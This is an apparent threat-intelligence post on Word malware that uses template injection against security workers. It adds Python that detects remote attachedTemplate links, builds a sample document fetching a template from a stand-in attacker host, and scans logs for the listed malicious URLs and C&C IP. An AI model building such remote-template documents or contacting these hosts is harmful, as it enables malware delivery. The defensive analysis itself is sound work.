Malware Disguised as a Manuscript Solicitation Letter (Targeting Security-Related Workers)

On January 8th, the ASEC analysis team identified the distribution of a document-type malware targeting workers in the security field. The obtained malware uses an external object within a Word document to execute an additional malicious macro. This technique is called template injection, and a similar attack case was covered in a previous blog post.

Malicious Word Documents with External Link of North Korea Related Materials

When the Word document is opened, it downloads and executes an additional malicious Word macro document from the threat actor’s C&C server. The additionally executed macro is written so that a normal (decoy) document is opened at the same time, to keep the user from noticing that macro code has been executed in the background.
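A defender can check for the technique described above without opening the file in Word. A .docx is a zip of XML parts, and the attached template is resolved through a relationship in word/_rels/settings.xml.rels; template injection is simply that relationship pointing at a remote .dotm with TargetMode="External". The following static check is an added example, not ASEC's or AhnLab's tooling. It builds a constructed sample document in memory (the template URL is a placeholder, not the real C&C) and reports every external relationship, distinguishing an ordinary hyperlink from a remotely fetched template.

```python
# Added example (not ASEC's or AhnLab's code): static check for Word template
# injection. Reports every External relationship in any *.rels part that points
# at a remote location, and flags the document when the attached template is one.
import io
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OFFICE_RELS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Targets that make Word reach outside the package when the file is opened.
REMOTE_PREFIXES = ("http://", "https://", "file://", "\\\\")


def find_external_relationships(docx_bytes):
    """Return (rels_part, relationship_type, target) for every relationship
    marked TargetMode="External" whose target is a remote location."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # a malformed part deserves a look, but not by this check
            for rel in root.iter(RELS_NS + "Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                target = rel.get("Target", "")
                if target.lower().startswith(REMOTE_PREFIXES):
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    findings.append((name, rel_type, target))
    return findings


def is_template_injection(docx_bytes):
    """True when the attached template is fetched from a remote location.
    Hyperlinks are External relationships too, so the relationship type matters."""
    return any(rel_type == "attachedTemplate"
               for _, rel_type, _ in find_external_relationships(docx_bytes))


def build_sample_docx(template_target=None):
    """Constructed sample for the demo: a minimal .docx with one ordinary external
    hyperlink and, when template_target is given, an external attachedTemplate
    relationship of the kind a template-injection document carries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
            '<?xml version="1.0" encoding="UTF-8"?>'
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
            '<Default Extension="xml" ContentType="application/xml"/></Types>')
        zf.writestr("word/document.xml",
            '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
            '<w:body><w:p><w:r><w:t>decoy text</w:t></w:r></w:p></w:body></w:document>')
        zf.writestr("word/_rels/document.xml.rels",
            '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            f'<Relationship Id="rId1" Type="{OFFICE_RELS}hyperlink" '
            'Target="https://www.example.com/" TargetMode="External"/></Relationships>')
        settings = '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"'
        if template_target is None:
            zf.writestr("word/settings.xml", settings + "/>")
        else:
            zf.writestr("word/settings.xml", settings +
                ' xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
                '<w:attachedTemplate r:id="rId1"/></w:settings>')
            zf.writestr("word/_rels/settings.xml.rels",
                '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
                f'<Relationship Id="rId1" Type="{OFFICE_RELS}attachedTemplate" '
                f'Target="{template_target}" TargetMode="External"/></Relationships>')
    return buf.getvalue()


if __name__ == "__main__":
    # Placeholder URL, not the real C&C from the analysis.
    for label, doc in (("benign", build_sample_docx()),
                       ("injected", build_sample_docx("http://attacker.example/upload/temp.dotm"))):
        print(label, "template injection:", is_template_injection(doc))
        for part, rel_type, target in find_external_relationships(doc):
            print("   ", part, rel_type, target)
```

To check a real sample, read the file's bytes and pass them to is_template_injection; .dotm and .docm packages use the same relationship layout. The check is static, so it never opens the document or contacts the target.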

The normal document file distributed with the malware by the threat actor has text written in Korean but includes Chinese fonts. From this, we can deduce that the threat actor is using a Chinese version of Word.

After the decoy document is opened, an information-stealing script is downloaded and executed. This script performs the actions below and forwards the collected information to the C&C server.

  • Infected PC system information
  • List of recently opened Word files
  • Directory listing of the system’s download folder
  • Modification of IE-related registry keys
  • Registration of a scheduled task to maintain a connection to the C&C server
  • Information on anti-virus products installed on the system

One thing to note is that on the threat actor’s C&C server IP (112.175.85.243), a phishing domain similar to the one covered in the “Web Page Disguised as a Kakao Login Page” blog post (published on January 10th) was additionally found. This suggests that the threat actor in the previous blog post and in this case is the same.

Recently, there has been a surge of APT attacks using the template injection method. Because this method is usually distributed via email attachments, users must refrain from opening attachments in emails from unknown senders to prevent infection.

Currently, AhnLab’s V3 detects relevant malware under the following aliases.


[IOC]

MD5

  • 2244f8798062d4cef23255836a2b4569
  • 2c9d6f178f652c44873edad3ae98fff5
  • 3fe5ce0be3ce20b0c3c9a6cd0dae4ae9
  • 68e79490ed1563904791ca54c97b680a
  • dd954121027d662158dcad24c21d04ba

URL

  • http[:]//lifehelper[.]kr/gnuboard4/bbs/img/upload/list[.]php?query=1
  • http[:]//lifehelper[.]kr/gnuboard4/bbs/img/upload/temp[.]docx
  • http[:]//lifehelper[.]kr/gnuboard4/bbs/img/upload/temp[.]dotm
  • http[:]//lifehelper[.]kr/gnuboard4/bbs/img/upload1/list[.]php?query=1
  • http[:]//lifehelper[.]kr/gnuboard4/bbs/img/upload1/temp[.]docx
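The URLs above are published defanged, so they have to be refanged before they are useful in a proxy or DNS log search. The script below is an added example (not AhnLab's tooling) that refangs the listed URLs, derives the hosts from them, and scans constructed proxy log lines for an exact URL match, a match on the host (which also catches sibling paths such as the upload1 directory), or a connection to the C&C IP given in the post. The log format is a simplified "timestamp client method url status" line made up for the demo.

```python
# Added example (not ASEC's or AhnLab's code): refang the published IOCs and
# match them against proxy log lines. The log lines below are constructed.
import re
from urllib.parse import urlsplit

# URLs exactly as published in the post (defanged).
DEFANGED_URLS = [
    "http[:]//lifehelper[.]kr/gnuboard4/bbs/img/upload/list[.]php?query=1",
    "http[:]//lifehelper[.]kr/gnuboard4/bbs/img/upload/temp[.]docx",
    "http[:]//lifehelper[.]kr/gnuboard4/bbs/img/upload/temp[.]dotm",
    "http[:]//lifehelper[.]kr/gnuboard4/bbs/img/upload1/list[.]php?query=1",
    "http[:]//lifehelper[.]kr/gnuboard4/bbs/img/upload1/temp[.]docx",
]
C2_IP = "112.175.85.243"  # C&C server IP from the post


def refang(ioc):
    """Undo the common defanging conventions used in IOC listings."""
    return ioc.replace("hxxp", "http").replace("[:]", ":").replace("[.]", ".")


IOC_URLS = {refang(u) for u in DEFANGED_URLS}
IOC_HOSTS = {urlsplit(u).hostname for u in IOC_URLS}

# Simplified, constructed log format: "<timestamp> <client> <method> <url> <status>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})")


def scan_proxy_log(lines):
    """Return one hit per matching line, with the reason it matched.
    Order of precedence: exact published URL, then host, then the C&C IP."""
    hits = []
    for number, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        url = m.group("url")
        host = urlsplit(url).hostname
        if url in IOC_URLS:
            reason = "exact-url"
        elif host in IOC_HOSTS:
            reason = "host"
        elif C2_IP in line:
            reason = "c2-ip"
        else:
            continue
        hits.append({"line": number, "client": m.group("client"),
                     "url": url, "reason": reason})
    return hits


# Constructed sample log: two downloads of the published URLs, one clean
# request, one request under a sibling path on the same host, and one
# CONNECT straight to the C&C IP.
SAMPLE_LOG = [
    "09:12:01 10.0.0.5 GET http://lifehelper.kr/gnuboard4/bbs/img/upload/temp.dotm 200",
    "09:12:03 10.0.0.5 GET http://lifehelper.kr/gnuboard4/bbs/img/upload/list.php?query=1 200",
    "09:13:10 10.0.0.7 GET https://www.example.com/index.html 200",
    "09:14:00 10.0.0.9 GET http://lifehelper.kr/gnuboard4/bbs/img/upload2/temp.docx 404",
    "09:15:00 10.0.0.9 CONNECT 112.175.85.243:443 200",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['client']} -> {hit['url']} [{hit['reason']}]")
```

The host-level match is deliberately broader than the published list: the post shows the same server serving both an upload and an upload1 directory, so any request to that host during the relevant period is worth triage, not only the five exact paths.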
